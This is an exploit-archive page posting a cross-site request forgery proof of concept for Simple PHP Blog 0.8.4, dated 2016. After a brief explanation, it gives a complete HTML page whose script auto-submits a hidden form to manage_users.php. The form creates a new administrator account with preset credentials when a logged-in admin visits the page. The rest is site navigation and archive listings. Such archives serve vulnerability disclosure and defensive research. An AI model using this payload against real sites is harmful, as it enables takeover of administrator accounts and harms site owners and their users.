Simple PHP Blog 0.8.4 Cross Site Request Forgery

Simple PHP Blog 0.8.4 Cross Site Request Forgery: Posted Oct 7, 2016; Authored by Besim; Simple PHP Blog version 0.8.4 suffers from a cross site request forgery vulnerability.; tags | exploit, php, csrf; SHA-256 | 7a769fb47130421f1c88cc48e0b0c98706ea619e034c03509dd7467b5d2c2205; Download | Favorite | View

Simple PHP Blog 0.8.4 Cross Site Request Forgery

<!--
 
=========================================================================================================
Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)
=========================================================================================================
 
# Exploit Title: Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add
Admin)
# Author: Besim
# Google Dork: -
# Date: 07/10/2016
# Type: webapps
# Platform : PHP
# Vendor Homepage: http://simpleblogphp.com/
# Software Link: https://sourceforge.net/projects/sphpblog/
# Version: 0.8.4
# Tested on: Ubuntu 14.04.5
 
Simple PHP Blog 0.8.4 versions is vulnerable to CSRF attack (No CSRF token
in place)
meaning that if an admin user can be tricked to visit a crafted URL created
by
attacker (via spear phishing/social engineering), a form will be submitted
to (*http://localhost/simple/manage_users.php?action=update&type=new
<http://localhost/simple/manage_users.php?action=update&type=new>*) that
will add a new user as administrator.
 
Once exploited, the attacker can login to the admin panel
(*http://localhost/simple/login.php <http://localhost/simple/login.php>*)
using the username and the password he posted in the form.
 
*CSRF PoC Code*
=============
 
-->
 
<html>
  <body>
    <form action="
http://localhost/simple/manage_users.php?action=update&type=new"
method="POST">
      <input type="hidden" name="sUsername" value="Besim" />
      <input type="hidden" name="sFullname" value="Besim" />
      <input type="hidden" name="sPassword" value="mehmet" />
      <input type="hidden" name="sEmail" value="mehmet@yopmail.com"
/>
      <input type="hidden" name="sAvatar" value="" />
      <input type="hidden" name="sActive" value="on" />
      <input type="hidden" name="sModComments" value="on" />
      <input type="hidden" name="sDeleteEntries" value="on" />
      <input type="hidden" name="sEditAny" value="on" />
      <input type="hidden" name="submit" value="Create User" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
 
 
 
 
-- 
 
Besim ALTiNOK

Top Authors In Last 30 Days

Red Hat 234 files
indoushka 93 files
Ubuntu 87 files
Gentoo 36 files
Jasper Nota 25 files
Debian 21 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,099)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,756)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,521)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,747)
UNIX (9,436)
UnixWare (187)
Windows (6,674)
Other

Simple PHP Blog 0.8.4 Cross Site Request Forgery

Simple PHP Blog 0.8.4 Cross Site Request Forgery

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Simple PHP Blog 0.8.4 Cross Site Request Forgery

Share This

Simple PHP Blog 0.8.4 Cross Site Request Forgery

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems